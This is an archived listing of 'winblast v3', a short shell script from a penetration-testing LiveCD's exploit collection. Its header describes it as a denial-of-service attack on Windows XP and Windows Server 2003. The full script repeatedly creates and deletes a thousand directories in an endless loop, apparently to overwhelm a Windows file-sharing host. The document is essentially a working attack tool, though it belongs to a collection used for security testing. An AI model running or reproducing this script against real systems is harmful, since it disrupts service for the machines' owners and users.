home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / winblast.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  771b  |  31 lines

  1. #!/bin/sh
  2. # winblast v3 - DoS on WinXP, Win2003Srv
  3. # 2003-12-04 Steve Ladjabi
  4.  
  5. count=0
  6.  
  7. # using 'pathcount' directories
  8. pathcount=1000
  9.  
  10. echo running \'winblast v3\' with $pathcount files in loop ...
  11.  
  12. while [ 1 ]; do
  13.         p=$((pathcount*2-1))
  14.         stop=$((pathcount-1))
  15.         while [ "$p" != "$stop" ]; do
  16.                 dirname=wbst$p
  17.                 # delete old directory if it exists and exit on any error
  18.                 if [ -d $dirname ]; then
  19.                         rmdir $dirname || exit 3
  20.                 fi;
  21.  
  22.                 # generating directory and exit on any error
  23.                 mkdir $dirname || exit 1
  24.                 p=$((p-1))
  25.                 count=$((count+1))
  26.         done;
  27.         echo $count directories generated ...
  28. done;
  29. #-- end --
  30.  
  31.